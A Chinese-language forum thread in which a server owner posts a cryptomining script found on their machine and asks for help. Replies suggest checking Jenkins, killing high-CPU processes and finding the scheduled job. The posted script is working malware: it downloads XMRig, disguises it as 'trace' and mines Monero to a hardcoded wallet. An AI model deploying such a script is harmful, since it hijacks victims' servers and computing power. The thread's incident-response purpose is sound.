上一主题 下一主题 服务器中挖矿病毒,有大佬给我解释一下下面代码什么作用吗

罐头的小窝 2019-12-24 03:09:23
#!/bin/bash

if pgrep trace; then pkill trace; fi

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";

rm -rf config.json;

d () {
curl -L --insecure --connect-timeout 30 --max-time 800 --fail "$1" -o "$2" 2> /dev/null || wget --no-check-certificate --timeout 800 --tries 1 "$1" -O "$2" 2> /dev/null || _curl "$1" > "$2";
}

test ! -s trace && \
d https://github.com/xmrig/xmrig/releases/download/v5.0.0/xmrig-5.0.0-xenial-x64.tar.gz trace.tgz && \
tar -zxvf trace.tgz && \
mv xmrig-5.0.0/xmrig trace && \
rm -rf xmrig-5.0.0 && \
rm -rf trace.tgz;
test ! -x trace && chmod +x trace;

k() {
./trace \
-r 2 \
-R 2 \
--keepalive \
--no-color \
--donate-level 1 \
--max-cpu-usage 85 \
--cpu-priority 3 \
--print-time 25 \
--threads "${threadCount:-4}" \
--url "$1" \
--user 46sfbbM3XSjBo54d5a8PYUU5yQ31x6Rpv6tBhe22Cd7VYeJUyFUhzBF5rTf1oTB1d8MqgHxX5RbbEEKZd8fBAAmcFfv9Y5c \
--pass x \
--coin xmr \
--keepalive
}

k xmr-asia1.nanopool.org:14444 || k xmr-eu2.nanopool.org:14444 || k xmr-us-east1.nanopool.org:14444 || k xmr-us-west1.nanopool.org:14444 || k xmr-asia1.nanopool.org:14444 || k xmr-jp1.nanopool.org:14444

怎么才能解决?另有酬谢。谢谢各位大佬
...全文
599 4 打赏 收藏 举报
写回复
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
罐头的小窝 2020-01-01

我不知道我开启什么服务了 怎么看啊
  • 打赏
  • 举报
回复
引用 2 楼 L.ค的回复:
[quote=引用 1 楼 考古学家lx 的回复:]
看起来是从那个链接把脚本病毒下载下来,然后解压运行

你开了jenkins吗

top查看下使用率较高的进程,然后kill掉

kill掉了,然后我把执行文件给替换掉了。CPU下去了 但是找不到定时任务在哪 。服务器还是定时下载压缩包[/quote] 这个运行后就把压缩包删了,find trace,你开启有什么服务?
  • 打赏
  • 举报
回复
罐头的小窝 2019-12-29
引用 1 楼 考古学家lx 的回复:
看起来是从那个链接把脚本病毒下载下来,然后解压运行

你开了jenkins吗

top查看下使用率较高的进程,然后kill掉

kill掉了,然后我把执行文件给替换掉了。CPU下去了 但是找不到定时任务在哪 。服务器还是定时下载压缩包
  • 打赏
  • 举报
回复
看起来是从那个链接把脚本病毒下载下来,然后解压运行 你开了jenkins吗 top查看下使用率较高的进程,然后kill掉
  • 打赏
  • 举报
回复
相关推荐
发帖
系统维护与使用区

1.9w+

社区成员

系统使用、管理、维护问题。可以是Ubuntu, Fedora, Unix等等
社区管理员
  • 系统维护与使用区社区
加入社区
帖子事件
创建了帖子
2019-12-24 03:09
社区公告
暂无公告